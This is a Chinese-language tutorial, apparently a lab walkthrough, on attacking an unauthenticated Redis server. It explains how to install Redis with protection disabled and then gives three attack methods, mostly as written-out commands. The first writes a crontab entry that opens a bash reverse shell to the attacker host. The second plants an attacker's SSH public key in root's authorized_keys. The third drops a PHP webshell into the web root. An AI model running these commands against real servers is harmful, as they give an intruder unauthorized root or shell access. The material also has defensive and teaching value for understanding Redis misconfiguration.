0x01 安裝redis
centos安裝Redis
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
修改配置文件 redis.conf
bind 127.0.0.1前面加上#號 protected-mode設為no
啟動redis-server
./src/redis-server redis-conf
0x02 Redis的基本命令
連接redis:
redis-cli -h 192.168.63.130
查看redis版本信息、一些具體信息、服務器版本信息等等:
192.168.63.130:6379>info
將變量x的值設為test:
192.168.63.130:6379>set x "test"
是把整個redis數據庫刪除,一般情況下不要用!!!
192.168.63.130:6379>flushall
查看所有鍵:
192.168.63.130:6379>KEYS *
獲取默認的redis目錄、和rdb文件名:可以在修改前先獲取,然后走的時候再恢復。
192.168.63.130:6379>CONFIG GET dir
192.168.63.130:6379>CONFIG GET dbfilename
第一種攻擊方法:利用計划任務來反彈一個shell權限。
首先在攻擊機設立一個nc反彈接收端。
之后執行命令,將值導出,改變導出目錄以及文件名
root@kali:~# redis-cli -h 192.168.63.130 // 開始連接靶機
192.168.63.130:6379> set x "* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1" //創建一個任務計划
OK
192.168.63.130:6379> config set dir /var/spool/cron/ // 改變導出目錄
OK
192.168.63.130:6379> config set dbfilename root // 改變文件名為root
OK
192.168.63.130:6379> save //保存
OK
之后linux攻擊機就會接收到反彈的shell了,不過這個也只能針對root權限,其他用戶可能沒有權限執行crontab命令。
第二種攻擊方法:寫ssh-keygen公鑰然后使用私鑰登陸
這次攻擊需要用到一款工具,叫做ssh-keygen,直接在linux里面執行 ssh-keygen -t rsa 就可以了,然后一路回車。
只不過和上次不同的是改變路徑罷了,實現的還是和上次一樣,目的就是導出文件。
192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK
之后無需密碼,直接登錄,非常刺激
第三種攻擊方法:寫webshell
這個就非常好理解了,和mysql日志提權一個道理,大家可以去試試。
192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK